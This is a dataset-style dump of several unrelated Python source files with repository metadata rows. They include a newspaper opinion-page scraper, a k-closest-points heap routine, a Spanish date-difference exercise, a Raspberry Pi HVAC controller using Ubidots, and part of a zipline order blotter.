    labels the source 'El Universo (ES)' (El Universo is Ecuadorian) — one
    of the two looks wrong; confirm which publication was intended.
    """
    listofurls=[]
    caturl='http://www.elmundo.es/opinion.html'
    catpage=fetchURL(caturl).read().decode('iso-8859-15') #rebels
    relchunk=catpage.split('<div class="cabecera-seccion">')[1]
    relchunk=relchunk.split('<section class="hot-topics">')[0]
    listofurls+=re.findall(r'(http://www.elmundo.es/opinion/\d{4}/.*)"', relchunk)
    listofurls=set(listofurls)
    for url in listofurls:
        parsethis=eluniversoreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def eluniversoreader(url):
    """Parse one article from the elmundo.es opinion section; return
    (linked_title, hits, source, date, author, desc).  Pages are encoded
    ISO-8859-15, not UTF-8."""
    source='El Universo (ES)'
    bulktext=fetchURL(url).read().decode('iso-8859-15', errors='replace')
    actualtext=bulktext.split('itemprop="articleBody"')
    actualtext=actualtext[1].split('<section class="valoracion" id="valoracion">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<h1 itemprop="headline">')[1].split('</h1>')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('s.prop75="')[1].split('";')[0]
    author=authorsnip.strip()
    datesnip=bulktext.split('<meta property="article:published_time" content="')[1].split('T')[0]
    date=datesnip.strip().replace('-', '')
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end eluniverso
###excelsior
def excelsiorgenerator(maxnumber=6):
    """Scrape Excélsior (MX)'s opinion index and log qualifying articles."""
    listofurls=[]
    caturl='http://www.excelsior.com.mx/opinion'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<div class = "mb2 float-left width664px height50 spriteFull background-hoy-escriben" > </div>')[1]
    relchunk=relchunk.split('"float-left width664px placa-seccion-opinion color-nacional"')[0]
    chops=relchunk.split('<div class = "option-section-title-text" >')
    urlinicius=''
    for chop in chops[1:]:
        urlterminus=chop.split(' href = "')[1].split('"')[0]
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=excelsiorreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def excelsiorreader(url):
    """Parse one Excélsior (MX) article; return (linked_title, hits, source, date, author, desc)."""
    source='Excélsior (MX)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    actualtext=bulktext.split('<!-- body -->')
    actualtext=actualtext[1].split('<!-- /body -->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<span id="node-autor"')[1].split('</a>')[0].split('>')[-1]
    author=authorsnip.strip()
    # Date appears as 'DD/MM/YYYY hh:mm'; keep the date part, emit YYYYMMDD.
    datesnip=bulktext.split('<span id="node-date"')[1].split('</span>')[0].split('>')[-1]
    datesnip=datesnip.strip().split(' ')[0]
    datesnipdiv=datesnip.split('/')
    year=datesnipdiv[2]
    month=datesnipdiv[1]
    day=datesnipdiv[0]
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end excelsior
###lanacion
def lanaciongenerator(maxnumber=20):
    """Scrape La Nación (AR)'s opinion index and log qualifying articles."""
    listofurls=[]
    caturl='http://www.lanacion.com.ar/opinion'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('itemtype="http://data-vocabulary.org/Breadcrumb">')[1]
    relchunk=relchunk.split('<section id="informacion2">')[0]
    urlregex=r'<a href="(\/\d+-\S*)" class="info">'
    listofurls+=re.findall(urlregex, relchunk)[:maxnumber]
    listofurls=set(listofurls)
    for url in listofurls:
        if not url.startswith('http://'):
            url='http://lanacion.com.ar'+url
        parsethis=lanacionreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def lanacionreader(url):
    """Parse one La Nación (AR) article; return (linked_title, hits, source, date, author, desc)."""
    source='La Nación (AR)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    actualtext=bulktext.split('<section id="cuerpo"')
    actualtext=actualtext[1].split('<span class="fin">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('LN.NotaTM.authors="')[1].split('";')[0]
    author=authorsnip.strip()
    # Dateline like 'Lunes 3 de Marzo de 2014'; rebuild as YYYYMMDD.
    datesnip=bulktext.split('<span class="fecha" itemprop="datePublished" content="')[1].split('"')[0]
    datesnipdiv=datesnip.strip().split(' ')
    year=datesnipdiv[-1]
    day=datesnipdiv[1]
    if len(day)<2:
        day='0'+day
    month=translateMonth(datesnipdiv[3])
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end lanacion
###milenio
def mileniogenerator(maxnumber=100):
    """Scrape Milenio (MX)'s columnists index and log qualifying articles."""
    listofurls=[]
    caturl='http://www.milenio.com/firmas/'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<h3 class="index-title">')[1]
    chops=relchunk.split('<h3 class="entry-short">')
    urlinicius='http://www.milenio.com/'
    for chop in chops[1:]:
        urlterminus=chop.split('<a class="lnk" href="')[1].split('"')[0]
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=milenioreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def milenioreader(url):
    """Parse one Milenio (MX) article; return (linked_title, hits, source, date, author, desc)."""
    source='Milenio (MX)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    actualtext=bulktext.split('<div itemprop="articleBody"')
    actualtext=actualtext[1].split('<!-- END: NESTED GRID 1/4 - 3/4 -->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<meta name="Author" content="')[1].split('"')[0]
    author=authorsnip.strip()
    datesnip=bulktext.split('<meta name="Pubdate" content="')[1].split('"')[0]
    date=datesnip.strip().replace('-', '')
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end milenio
###prensalibre
def prensalibregenerator():
    """Scrape Prensa Libre (GT)'s opinion left column and log qualifying articles."""
    listofurls=[]
    caturl='http://www.prensalibre.com/opinion/'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<!-- LEFT COL -->')[1]
    relchunk=relchunk.split('<!-- RIGHT COL -->')[0]
    urlregex=r'<h2><a href="(\/opinion\/\S+)">.+</a></h2>'
    listofurls+=re.findall(urlregex, relchunk)
    listofurls=set(listofurls)
    for url in listofurls:
        if not url.startswith('http://'):
            url='http://prensalibre.com'+url
        parsethis=prensalibrereader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def prensalibrereader(url):
    """Parse one Prensa Libre (GT) article; return (linked_title, hits, source, date, author, desc)."""
    source='Prensa Libre (GT)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    actualtext=bulktext.split('<!-- Texto de Opinión -->')
    actualtext=actualtext[1].split('<!-- Otras noticias de la sección -->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta name="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<p class="author"><strong>')[1].split('</strong> </p>')[0]
    author=authorsnip.strip()
    # Date appears as 'DD/MM/YY - hh:mm'; expand the 2-digit year.
    dateregex=r'(\d{2}\/\d{2}\/\d{2}) - \d{2}:\d{2}'
    datesnip=re.findall(dateregex, bulktext)[0]
    datesnipdiv=datesnip.split('/')
    day=datesnipdiv[0]
    month=datesnipdiv[1]
    year='20'+datesnipdiv[2] #This will work until year 2100
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end prensalibre
###semana
def semanagenerator():
    """Scrape Semana (CO)'s online opinion section and log qualifying articles."""
    listofurls=[]
    caturl='http://www.semana.com/seccion/opinion-online/81-1'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<div id="espacioColumnistas" >')[1]
    relchunk=relchunk.split('<!--hasta aca se carga la sección-->')[0]
    urlregex=r'<a href="(http:\/\/www\.semana\.com\/opinion\/articulo\/\S+)"'
    listofurls+=re.findall(urlregex, relchunk)
    listofurls=set(listofurls)
    for url in listofurls:
        parsethis=semanareader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def semanareader(url):
    """Parse one Semana (CO) article; return (linked_title, hits, source, date, author, desc)."""
    source='Semana (CO)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    actualtext=bulktext.split('<div class="container_article" id="contents" >')
    actualtext=actualtext[1].split('<!-- Recs&ads widget start -->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="ps:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<meta property="ps:author" content="')[1].split('"')[0]
    author=authorsnip.strip()
    # Publication date is 'DD/MM/YYYY hh:mm'; reassemble as YYYYMMDD.
    datesnip=bulktext.split('<meta name="cXenseParse:recs:articlepublicationdate" content="')[1].split('"')[0]
    datesnip=datesnip.split(' ')[0]
    datesnipdiv=datesnip.split('/')
    date=datesnipdiv[-1]+datesnipdiv[-2]+datesnipdiv[-3]
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end semana
###EXECUTION COMMANDS
# Run every scraper in sequence; each one appends its qualifying rows
# between the HTML header (startLog) and the footer (endLog).
startLog()
claringenerator()
elcomercioPEgenerator()
elespectadorgenerator()
elmercuriogenerator()
elnacionalgenerator()
elpaisgenerator()
eltiempogenerator()
eluniversalgenerator()
eluniversogenerator()
excelsiorgenerator()
lanaciongenerator()
mileniogenerator()
prensalibregenerator()
semanagenerator()
endLog()
| [
"orgullomoore@gmail.com"
] | orgullomoore@gmail.com |
fadcabb3f730cb88d0fc2352df06bd1a08b79edb | 4a4e214268df1ba7b24c1ee4e7a4439055e5d0f2 | /k_closest_points_using_heapmax.py | b69c010979f4ac4cc612d708a42f143e0bbe4f01 | [] | no_license | arturoaviles/k_closest_points | 5a1fc3b0bd024f600f039fa837e3b957bc7b6a9a | 9d9c315ca615f016908a7641ff4ad6b56c06f1b6 | refs/heads/master | 2020-04-30T21:30:15.325606 | 2019-03-22T07:42:16 | 2019-03-22T07:42:16 | 177,094,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | import heapq
# Six sample coordinates, tiled 2,000,000x (12 million points total) to
# stress-test the selection below.
points = [
    (-2, -4), (0, -2), (-1, 0), (3, -5), (-2, -3), (3, 2)
] * 2000000
def closest_points(points, k):
    """Return the k points nearest the origin, sorted by distance.

    Each element of the result is a (distance, x, y) tuple where distance
    is the true Euclidean distance.

    Fixes over the original:
    - ``(x ** 2 + y ** 2) ** 1/2`` binds as ``((x**2 + y**2) ** 1) / 2``
      (half the squared distance), not the square root; ``** 0.5`` is used.
    - ``heapq._heapify_max`` is a private CPython helper; a public-API
      max-heap (negated keys) with ``heapreplace`` is used instead, which
      also replaces the O(k) full re-heapify per update with O(log k),
      matching the advertised O(n + (n-k)*log k) cost.
    """
    distances = [((x ** 2 + y ** 2) ** 0.5, x, y) for x, y in points]
    # Seed a max-heap (negated distances) with the first k candidates.
    heap = [(-d, x, y) for d, x, y in distances[:k]]
    heapq.heapify(heap)
    for d, x, y in distances[k:]:
        if d < -heap[0][0]:  # closer than the current worst of the best k
            heapq.heapreplace(heap, (-d, x, y))
    return sorted((-nd, x, y) for nd, x, y in heap)
| [
"aaviles@nearshoremx.com"
] | aaviles@nearshoremx.com |
84a2a9db3cd847433912ae84459035f42045f6bc | da3e36172daaf863ef73372f8c36cc2629ec1769 | /UMDC/03/17g.py | ce55196990dd77c97e38c5ebc70122baad56ce1d | [] | no_license | mentecatoDev/python | 08eef1cb5a6ca2f16b01ee98192ccf1a65b9380a | 80ddf541d3d1316ba8375db8f6ec170580e7831b | refs/heads/master | 2021-06-30T07:03:51.957376 | 2021-02-22T09:40:46 | 2021-02-22T09:40:46 | 222,322,503 | 3 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,333 | py | """
Ejercicio 17g
Escribir funciones que resuelvan los siguientes problemas:
g) Dadas dos fechas (dia1, mes1, año1, dia2, mes2, año2), indicar el tiempo
transcurrido entre ambas, en años, meses y dias. Nota: en todos los casos,
involucrar las funciones escritas previamente cuando sea posible.
"""
def bisiesto(anio):
    """Return True when `anio` is a leap year under the Gregorian rules:
    divisible by 4, except centuries, which must also be divisible by 400.
    """
    if anio % 400 == 0:
        return True
    if anio % 100 == 0:
        return False
    return anio % 4 == 0
def dias_mes(mes, anio):
"""Devuelve los días de cualquier mes teniendo en cuenta el anio."""
if mes in (1, 3, 5, 7, 8, 10, 12):
return 31
elif mes in (4, 6, 9, 11):
return 30
elif mes == 2:
if bisiesto(anio):
return 29
else:
return 28
else:
return -1
def validar_fecha(dia, mes, anio):
dm = dias_mes(mes, anio)
if dm == -1:
return -1
if dm < dia:
return False
elif mes > 12:
return False
else:
return True
def dias_faltan(dia, mes, anio):
    """Days remaining until the end of the month (-1 for an invalid date)."""
    if not validar_fecha(dia, mes, anio):
        return -1
    return dias_mes(mes, anio) - dia
print(dias_faltan(1, 1, 2000))  # sanity check: 30 days left in January
def dias_fin_anio(dia, mes, anio):
    """Days from the given date to December 31 (-1 for an invalid date)."""
    if not validar_fecha(dia, mes, anio):
        return -1
    # Rest of the current month plus every following full month.
    restantes = sum(dias_mes(m, anio) for m in range(mes + 1, 13))
    return restantes + dias_faltan(dia, mes, anio)
def dias_principio(dia, mes, anio):
    """Days elapsed since January 1 (0 for Jan 1; -1 for an invalid date)."""
    if not validar_fecha(dia, mes, anio):
        return -1
    total = 365 if bisiesto(anio) else 364
    return total - dias_fin_anio(dia, mes, anio)
def dias_transcurridos(dia1, mes1, anio1, dia2, mes2, anio2):
    """Return the number of days between two dates (second assumed later)."""
    if anio1 == anio2:
        # Same year: difference of day-of-year offsets.
        return dias_principio(dia2, mes2, anio2) - dias_principio(dia1, mes1, anio1)
    # Different years: tail of the first year + head of the last year
    # (+1 for crossing New Year) + every full year in between.
    total = dias_fin_anio(dia1, mes1, anio1) + dias_principio(dia2, mes2, anio2) + 1
    for anio in range(anio1 + 1, anio2):
        total += 366 if bisiesto(anio) else 365
    return total
print(dias_transcurridos(1, 1, 2001, 31, 12, 2002))  # sanity check: 729 days
| [
"favila@iesromerovargas.com"
] | favila@iesromerovargas.com |
c63356a685b663f6948f971cbbea4317c9ee4d59 | bc46638835f1f248550b05c49450ef6e632cec50 | /Ubidots-Finaltest.py | 460b2ba2c49049a7be2c04efd128cd3d75ec97d5 | [
"MIT"
] | permissive | shijiediqiucunzj/Energy-Management-of-HVAC-Systems | e9da10104b8a1a5a509ec119ded2319356b7dc3b | 64fced60248500ab59e953ad7628ccc533cf983e | refs/heads/master | 2022-07-23T23:04:20.685016 | 2017-05-28T08:50:45 | 2017-05-28T08:50:45 | 182,559,359 | 0 | 0 | MIT | 2022-06-02T21:22:30 | 2019-04-21T16:53:46 | Python | UTF-8 | Python | false | false | 4,091 | py | # FYP2017
# Program to establish ZigBee communication between raspberry Pi and arduino
# Complete control of HVAC elements based on commands sent from the Pi
# Author: Kunal Jagadeesh
# License: Public Domain
import time
import serial
from ubidots import ApiClient
one = 1   # payload value meaning "actuator ON"
zero = 0  # payload value meaning "actuator OFF" (0 is also written literally below)
# Read the Ubidots API key from a local file kept out of version control.
f = open('Ubidots_APIkey.txt', 'r')
apikey = f.readline().strip()
f.close()
api = ApiClient(token = apikey)
try:
    # Bind the Ubidots cloud variables (sensor readings and actuator
    # switches) by their fixed variable ids.
    roomtemp = api.get_variable("58d763b8762542260a851bd1")
    roomhumidity = api.get_variable("58d763c57625422609b8d088")
    cooler = api.get_variable("58d768e0762542260a855c7a")
    heater = api.get_variable("58d768eb7625422609b91152")
    humidifier = api.get_variable("58d768f8762542260cf3b292")
    exhaust = api.get_variable("58d76907762542260dfad769")
except ValueError:
    print('Unable to obtain variable')
# Start with every actuator switched off.
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
hour = 3600  # seconds per hour (currently unused)
PORT = '/dev/ttyUSB0'
BAUD_RATE = 9600
# Open serial port
ser = serial.Serial(PORT, BAUD_RATE)
def getSensorData():
    """Request one humidity/temperature sample from the Arduino over XBee.

    Writes the 's' command byte, reads the reply line (first 5 characters
    are humidity, the rest temperature), pushes both readings to Ubidots,
    and returns them as a (humidity, temperature) float tuple.
    """
    # Re-open the port so every poll starts from a clean serial state.
    if ser.isOpen():
        ser.close()
    ser.open()
    ser.isOpen()
    ser.write('s'.encode())
    time.sleep(2)  # give the Arduino time to sample and answer
    response = ser.readline().strip().decode()
    hum = float(response[:5])
    temp = float(response[5:])
    try:
        roomtemp.save_value({'value': temp})
        roomhumidity.save_value({'value': hum})
        print('Value',temp,'and',hum, 'sent')
        time.sleep(2)
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; cloud upload stays best-effort.
        print('Value not sent')
    return (hum, temp)
def level_1():
    """Comfort level 1 (widest band): intervene only outside 15-35 degC / 25-80 %RH."""
    hum, temp = getSensorData()
    if temp > 35:
        cooler.save_value({'value': one})
        time.sleep(2)
    if temp < 15:
        heater.save_value({'value': one})
        time.sleep(2)
    if hum < 25:
        humidifier.save_value({'value': one})
        time.sleep(2)
    if hum > 80:
        exhaust.save_value({'value': one})
        time.sleep(2)
    # Let any selected actuator run, then switch everything off again.
    time.sleep(10)
    for actuator in (cooler, heater, humidifier, exhaust):
        actuator.save_value({'value': 0})
def level_2():
    """Comfort level 2: intervene outside 18-32 degC / 30-70 %RH."""
    hum, temp = getSensorData()
    if temp > 32:
        cooler.save_value({'value': one})
        time.sleep(2)
    if temp < 18:
        heater.save_value({'value': one})
        time.sleep(2)
    if hum < 30:
        humidifier.save_value({'value': one})
        time.sleep(2)
    if hum > 70:
        exhaust.save_value({'value': one})
        time.sleep(2)
    # Let any selected actuator run, then switch everything off again.
    time.sleep(10)
    for actuator in (cooler, heater, humidifier, exhaust):
        actuator.save_value({'value': 0})
def level_3():
    """Comfort level 3: intervene outside 20-30 degC / 40-60 %RH."""
    hum, temp = getSensorData()
    if temp > 30:
        cooler.save_value({'value': one})
        time.sleep(2)
    if temp < 20:
        heater.save_value({'value': one})
        time.sleep(2)
    if hum < 40:
        humidifier.save_value({'value': one})
        time.sleep(2)
    if hum > 60:
        exhaust.save_value({'value': one})
        time.sleep(2)
    # Let any selected actuator run, then switch everything off again.
    time.sleep(10)
    for actuator in (cooler, heater, humidifier, exhaust):
        actuator.save_value({'value': 0})
def level_4():
    """Comfort level 4 (tightest band): 22-27 degC / 25-30 %RH."""
    hum, temp = getSensorData()
    if temp > 27:
        cooler.save_value({'value': one})
        time.sleep(2)
    if temp < 22:
        heater.save_value({'value': one})
        time.sleep(2)
    if hum < 25:
        humidifier.save_value({'value': one})
        time.sleep(2)
    if hum > 30:
        exhaust.save_value({'value': one})
        time.sleep(2)
    # Let any selected actuator run, then switch everything off again.
    time.sleep(10)
    for actuator in (cooler, heater, humidifier, exhaust):
        actuator.save_value({'value': 0})
def getLevel():
    # Placeholder selector: the comfort level is hard-coded to the strictest
    # band (4) until a real source (e.g. user input / config) exists.
    return 4
if __name__ == "__main__":
    # Poll forever, applying the comfort-band rules for the configured level.
    # Any unknown level tells the Arduino to shut down ('x') and exits.
    level = getLevel()
    while True:
        if (level == 1):
            level_1()
        elif (level == 2):
            level_2()
        elif (level == 3):
            level_3()
        elif (level == 4):
            level_4()
        else:
            ser.write('x'.encode())
            break
| [
"kunal.jagadish07@gmail.com"
] | kunal.jagadish07@gmail.com |
f3a8f4fa0afc7f7f1ea26142d7b365249322a846 | 395b49dd992103e905c97a7b569eb21c1e887791 | /rectangulo.py | aeaef65359087b466480797c97c8026cff31b50b | [] | no_license | joshuaavalos74/Ejercicios-en-clase-2017 | e728995e05b42e9a30d7fd73e5454ab8ff60c898 | 34789d0a3e17fab55039224e438f7f9f336fecde | refs/heads/master | 2021-01-11T19:17:48.730605 | 2017-09-05T16:19:50 | 2017-09-05T16:19:50 | 79,346,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | def rec(alt,anch):
r=""
for i in range (0,alt):
r+= ("*"*anch)+"\n"
return r
| [
"joshuaavalos74@gmail.com"
] | joshuaavalos74@gmail.com |
c861a7bd871a32d79e69a95945186ca90b111af0 | 5e97b099899704a7525b6b0ce98dcf761bbf6763 | /finance/blotter.py | fb88f514a7cc740df3298d08fe4c58a43bc73f56 | [] | no_license | fswzb/zipline | 004d76d1658ec9185c125de96513e7312923205f | a504049d46f0d4518375b525c7b6ae083b4a3ea0 | refs/heads/master | 2020-05-23T10:20:57.972088 | 2017-01-12T17:23:27 | 2017-01-12T17:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,740 | py | #
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import uuid
from copy import copy
from logbook import Logger
from collections import defaultdict
from six import text_type
import zipline.errors
import zipline.protocol as zp
from zipline.finance.slippage import (
MySlippage,
transact_partial,
check_order_triggers
)
from zipline.finance.commission import PerDollar_A
log = Logger('Blotter')
from zipline.utils.protocol_utils import Enum
# Lifecycle states of an Order: OPEN until fully filled or cancelled.
ORDER_STATUS = Enum(
    'OPEN',
    'FILLED',
    'CANCELLED'
)
class Blotter(object):
    """Collects orders placed by the algorithm and matches them against
    incoming trade events, producing transactions through the configured
    slippage and commission models."""
    def __init__(self):
        # Slippage/commission pipeline turning (trade, orders) into txns.
        self.transact = transact_partial(MySlippage(0.1,0.0), PerDollar_A())
        # these orders are aggregated by sid
        self.open_orders = defaultdict(list)
        # keep a dict of orders by their own id
        self.orders = {}
        # holding orders that have come in since the last
        # event.
        self.new_orders = []
        self.current_dt = None
        self.max_shares = int(1e+11)
    def __repr__(self):
        return """
{class_name}(
    transact_partial={transact_partial},
    open_orders={open_orders},
    orders={orders},
    new_orders={new_orders},
    current_dt={current_dt})
""".strip().format(class_name=self.__class__.__name__,
                   transact_partial=self.transact.args,
                   open_orders=self.open_orders,
                   orders=self.orders,
                   new_orders=self.new_orders,
                   current_dt=self.current_dt)
    def set_date(self, dt):
        """Record the simulation datetime used to stamp new orders."""
        self.current_dt = dt
    def order(self, sid, amount, style, order_id=None):
        # something could be done with amount to further divide
        # between buy by share count OR buy shares up to a dollar amount
        # numeric == share count AND "$dollar.cents" == cost amount
        """
        Place a new order and return its id (None for zero-share orders).

        amount > 0 :: Buy/Cover
        amount < 0 :: Sell/Short
        Market order: order(sid, amount)
        Limit order: order(sid, amount, LimitOrder(price))
        Stop order: order(sid, amount, StopOrder(price))
        StopLimit order: order(sid, amount, StopLimitOrder(price))
        """
        if amount == 0:
            # Don't bother placing orders for 0 shares.
            return
        elif amount > self.max_shares:
            # Arbitrary limit of 100 billion (US) shares will never be
            # exceeded except by a buggy algorithm.
            raise OverflowError("Can't order more than %d shares" %
                                self.max_shares)
        is_buy = (amount > 0)
        order = Order(
            dt=self.current_dt,
            sid=sid,
            amount=amount,
            stop=style.get_stop_price(is_buy),
            limit=style.get_limit_price(is_buy),
            id=order_id
        )
        self.open_orders[order.sid].append(order)
        #print "blotter111: just placed new order, current open_orders: \n"
        #print(self.open_orders[order.sid])
        self.orders[order.id] = order
        self.new_orders.append(order)
        return order.id
    def cancel(self, order_id):
        """Cancel an open order and queue its new status for broadcast."""
        if order_id not in self.orders:
            return
        cur_order = self.orders[order_id]
        if cur_order.open:
            order_list = self.open_orders[cur_order.sid]
            if cur_order in order_list:
                order_list.remove(cur_order)
            if cur_order in self.new_orders:
                self.new_orders.remove(cur_order)
            cur_order.cancel()
            cur_order.dt = self.current_dt
            # we want this order's new status to be relayed out
            # along with newly placed orders.
            self.new_orders.append(cur_order)
    def process_split(self, split_event):
        """Adjust every open order on the split's sid by the split ratio."""
        if split_event.sid not in self.open_orders:
            return
        orders_to_modify = self.open_orders[split_event.sid]
        for order in orders_to_modify:
            order.handle_split(split_event)
    def process_trade(self, trade_event, cash):
        """Yield (transaction, order) pairs produced by matching *trade_event*
        against this sid's open orders; prunes filled orders afterwards."""
        if trade_event.type != zp.DATASOURCE_TYPE.TRADE:
            return
        if trade_event.sid not in self.open_orders:
            return
        if trade_event.volume < 1 or math.isnan(trade_event.volume):
            # there are zero volume trade_events bc some stocks trade
            # less frequently than once per minute.
            return
        orders = self.open_orders[trade_event.sid]
        orders = sorted(orders, key=lambda o: o.dt)
        # Only use orders for the current day or before
        current_orders = filter(
            lambda o: o.dt <= trade_event.dt,
            orders)
        #print "blotter160: current orders that go into process_txn: \n"
        #print(current_orders)
        for txn, order in self.process_transactions(trade_event,
                                                    current_orders,
                                                    cash):
            yield txn, order
            #print "order amount after process_txn: %s\n"%order.amount
            #print "order filled: %s\n"%order.filled
            #print "order open_amount after process_txn: %s\n"%order.open_amount
        # update the open orders for the trade_event's sid
        self.open_orders[trade_event.sid] = \
            [order for order
             in self.open_orders[trade_event.sid]
             if order.open]
    def process_transactions(self, trade_event, current_orders, cash):
        """Book the slippage/commission output onto the affected orders,
        yielding each non-commission (transaction, order) pair."""
        for order, txn in self.transact(trade_event, current_orders, cash):
            if txn.type == zp.DATASOURCE_TYPE.COMMISSION:
                order.commission = (order.commission or 0.0) + txn.cost
            else:
                if txn.amount == 0:
                    raise zipline.errors.TransactionWithNoAmount(txn=txn)
                if math.copysign(1, txn.amount) != order.direction:
                    raise zipline.errors.TransactionWithWrongDirection(
                        txn=txn, order=order)
                if abs(txn.amount) > abs(self.orders[txn.order_id].amount):
                    raise zipline.errors.TransactionVolumeExceedsOrder(
                        txn=txn, order=order)
                order.filled += txn.amount
                if txn.commission is not None:
                    order.commission = ((order.commission or 0.0)
                                        + txn.commission)
                # mark the date of the order to match the transaction
                # that is filling it.
                order.dt = txn.dt
                yield txn, order
class Order(object):
    """A single buy/sell instruction: tracks fill progress, commission, and
    stop/limit trigger state until it is filled or cancelled."""
    def __init__(self, dt, sid, amount, stop=None, limit=None, filled=0,
                 commission=None, id=None):
        """
        @dt - datetime.datetime that the order was placed
        @sid - stock sid of the order
        @amount - the number of shares to buy/sell
        a positive sign indicates a buy
        a negative sign indicates a sell
        @filled - how many shares of the order have been filled so far
        """
        # get a string representation of the uuid.
        self.id = id or self.make_id()
        self.dt = dt
        self.created = dt
        self.sid = sid
        self.amount = amount
        self.filled = filled
        self.commission = commission
        self._cancelled = False
        self.stop = stop
        self.limit = limit
        self.stop_reached = False
        self.limit_reached = False
        # +1.0 for buys, -1.0 for sells (sign of the requested amount).
        self.direction = math.copysign(1, self.amount)
        self.type = zp.DATASOURCE_TYPE.ORDER
    def make_id(self):
        """Return a fresh hex uuid used as the order id."""
        return uuid.uuid4().hex
    def to_dict(self):
        """Return a plain-dict view of the order for serialization,
        dropping internal-only fields and adding the derived status."""
        py = copy(self.__dict__)
        for field in ['type', 'direction', '_cancelled']:
            del py[field]
        py['status'] = self.status
        return py
    def to_api_obj(self):
        """Wrap this order's dict form in a protocol Order object."""
        pydict = self.to_dict()
        obj = zp.Order(initial_values=pydict)
        return obj
    def check_triggers(self, event):
        """
        Update internal state based on price triggers and the
        trade event's price.
        """
        stop_reached, limit_reached, sl_stop_reached = \
            check_order_triggers(self, event)
        if (stop_reached, limit_reached) \
                != (self.stop_reached, self.limit_reached):
            self.dt = event.dt
        self.stop_reached = stop_reached
        self.limit_reached = limit_reached
        if sl_stop_reached:
            # Change the STOP LIMIT order into a LIMIT order
            self.stop = None
    def handle_split(self, split_event):
        """Rescale the share amount and trigger prices for a stock split."""
        ratio = split_event.ratio
        # update the amount, limit_price, and stop_price
        # by the split's ratio
        # info here: http://finra.complinet.com/en/display/display_plain.html?
        # rbid=2403&element_id=8950&record_id=12208&print=1
        # new_share_amount = old_share_amount / ratio
        # new_price = old_price * ratio
        self.amount = int(self.amount / ratio)
        if self.limit is not None:
            self.limit = round(self.limit * ratio, 2)
        if self.stop is not None:
            self.stop = round(self.stop * ratio, 2)
    @property
    def status(self):
        # CANCELLED wins over everything; otherwise FILLED once no shares
        # remain open.
        if self._cancelled:
            return ORDER_STATUS.CANCELLED
        return ORDER_STATUS.FILLED \
            if not self.open_amount else ORDER_STATUS.OPEN
    def cancel(self):
        self._cancelled = True
    @property
